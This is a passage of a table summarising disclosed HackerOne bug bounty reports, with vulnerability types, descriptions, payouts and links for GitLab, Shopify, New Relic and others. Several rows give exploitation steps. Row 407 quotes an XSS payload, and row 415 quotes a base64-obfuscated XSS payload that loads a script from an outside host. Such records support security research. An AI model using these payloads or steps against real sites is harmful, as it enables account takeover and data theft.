| 397 | Improper access control | Script Editor tokens do not expire and thus, scripts can still be edited and added if you have the token, even if the Script Editor application is uninstalled. The scripts can also no longer be seen or edited unless manually accessing/calling the API if the script is renamed to an empty character. | $2000 | Shopify | https://hackerone.com/reports/915940 |
| 398 | Information disclosure | Within the same company, it was possible to access data one should not be able to, when having the Auditor role. |
$100 | Visma Public | https://hackerone.com/reports/959897 |
| 399 | Privilege Escalation | By navigating directly to the relevant endpoints instead of relying on the UI, and restricted user is able to create integrations with AWS, even though his role forbids this. | $750 | New Relic | https://hackerone.com/reports/255685 |
| 400 | Privilege Escalation | By logging in to New Relic Synthetics with no permissions, observing calls allows you to identify a call returning all data about the monitor’s and permissions for the group. | $750 | New Relic | https://hackerone.com/reports/320689 |
| 401 | IDOR | By adding a new user to your New Relic account as an admin, you are able to disclose their full name on the https://alerts.newrelic.com/accounts/ACCOUNT_ID/channelspage |
$1500 | New Relic | https://hackerone.com/reports/344309 |
| 402 | IDOR | When creating an account for a new user, the admin cannot see the name of the account holder. This vulnerability allowed an attacker to disclose such data through the API endpoint ` https://alerts.newrelic.com/internal_api/1/accounts/YOURACCOUNTNUMBER/users/` | $1500 | New Relic | https://hackerone.com/reports/332381 |
| 403 | Improper access control | If a permanent maintainer creates a mirror then removes it, any other project maintainer can create a mirror that is similar to the first one created. This is contrary to what documentations states and can allow an attacker to plant backdoors or push to a repository after being removed from the project. | $3000 | GitLab | https://hackerone.com/reports/819821 |
| 404 | IDOR | By creating an account on customers.gitlab.com, then linking it to the victims account by using their userId (it is sequential and easy to get), you will: 1. Remove all subscriptions, 2. Get access to all future updates, including credit card registration!, 3. Attacker can use registered information. | $3500 | GitLab | https://hackerone.com/reports/674195 |
| 405 | Privilege Escalation | If a gitlab admin uses the impersonate function, the admin cookie will be replaced with the user cookie and have a “Stop impersonating” button available to return to the admin account. This session shows up in the sessions overview of the user, so if the user switches to this session, he can click the “Stop impersonating”-button and get admin access. |
$10,000 | GitLab | https://hackerone.com/reports/493324 |
| 406 | Logic bug | An attacker was able to run arbitrary pipeline jobs as the victim. By creating a repository and a mirrored project with trigger pipelines for mirror updates enabled, and then inviting the victim as an owner, then deleting the original owner, the pipeline will execute in the context of the victim account. |
$12,000 | GitLab | https://hackerone.com/reports/894569 |
| 407 | XSS | Stored XSS in groups, by naming the group as an XSS payload - ` “><img src=x onerror=prompt(123)> - and clicking New Project` |
$2500 | GitLab | https://hackerone.com/reports/647130 |
| 408 | Improper access control | The jira_status field has an issue with sort_by allowing an attacker to see if a report is using Jira or not. |
$550 | Hackerone | https://hackerone.com/reports/955286 |
| 409 | XSS | Stored XSS on eaccounting.stage.vismaonline.com |
$250 | Visma Public | https://hackerone.com/reports/897523 |
| 410 | CSRF | Due to disclosing part of the authenticity token used to generate csrf tokens. Using this, an attacker can generate valid CSRF tokens for any arbitrary route. | $500 | Ruby on Rails | https://hackerone.com/reports/732415 |
| 411 | Improper access control | Ability to publish any theme for free, by extracting the ID of the paid theme, and then intercepting the update to a free theme and replacing that ID with the ID of the paid theme. | $2000 | Shopify | https://hackerone.com/reports/927567 |
| 412 | Improper access control | Ability to publish any theme for free, by race condition when installing the theme. This is done by finding a paid theme and clicking the Try theme button. Then, while it is installing, issuing the PublishLegacy call for a free theme. Then intercept and modify the first GraphQL Query to ThemesProcessingLegacy where you replace the theme ID with the paid theme ID. |
$2000 | Shopify | https://hackerone.com/reports/953083 |
| 413 | XSS | File upload with a unicode character and XSS payload causes the webpage created to execute the script | $600 | WordPress | https://hackerone.com/reports/179695 |
| 414 | Code injection | XSS to RCE by uploading html as part of a snippet. The map-function allows arbitrary inclusion of resources, leading to being able to execute any command. There are also multiple issues with storage of payloads in Slack’s environment, leading to being able to host code on trusted domains. | $1750 | Slack | https://hackerone.com/reports/783877 |
| 415 | XSS | Due to taking unsantizied input from websockets and rendering it on the recipients side, it is possible to achieve XSS on support desk conversations and gain access to support tickets and client information. The payload was: ws.send('{"action":"send_message","data":{"type":2,"uuid":"katO0xuiIy","media_thumb":"xxdata\\" onerror=\\"eval(atob(\'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vcGl0ci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7\'));//","media_url":"media-url"},"uuid":"katO0xuiIy","token":"bz+OjfTeBL/BRozszXwKbT10voEb0crFVRWBktvQifQ=","projectId":1,"messengerType":9}') |
$500 | QiWi | https://hackerone.com/reports/512065 |
| 416 | Improper authentication | Due to improper parsing and display of the from address, it was possible to send emails from any @mail.ru address while passing DKIM and DMARC verification, even though the email is spoofed. The bug happens when there are two “From” headers and the incorrect, but spoofed address is added as “From |
$150 | Mail.ru | https://hackerone.com/reports/731878 |
| 417 | IDOR | IDOR in dictor.mail.ru allowed an attacker to get any video information through GraphQL query | $2500 | Mail.ru | https://hackerone.com/reports/924914 |
| 418 | Information disclosure | Config files were accessible for warofdragons.my.games, leaking database credentials and other information | $150 | Mail.ru | https://hackerone.com/reports/786609 |
| 419 | CRLF injection | www.starbucks.com/email-prospectt was vulnerable to CRLF injection allowing for header injection (for example injecting CORS headers) or HTTP response splitting, which can be further exploited. | $250 | Starbucks | https://hackerone.com/reports/858650 |
| 420 | XSS | It is possible to achieve stored XSS if an attacker can upload files using Active storage, by utilizing the proxy-functionality included in Ruby on Rails. | $500 | Ruby on Rails | https://hackerone.com/reports/949513 |
| 421 | XSS | It was possible to achieve stored XSS in the Post title on Imgur. This was achieved using a standard "><svg payload. |
$250 | Imgur | https://hackerone.com/reports/942859 |
| 422 | Logic bug | Email bypass for shopify accounts that did not have Shopify IDs. This allowed an attacker to exploit a flaw in the flow, allowing for taking over these accounts without any verification. | $22,500 | Shopify | https://hackerone.com/reports/867513 |
| 423 | Information leak | Anonymous access to a Sidekiq process dashboard was possible on shopper.sbermarket.ru | $500 | Mail.ru | https://hackerone.com/reports/951190 |
| 424 | DoS | Browser-dependent DoS by injecting invalid link: http://twitter.com:627732462 |
$1120 | https://hackerone.com/reports/903740 |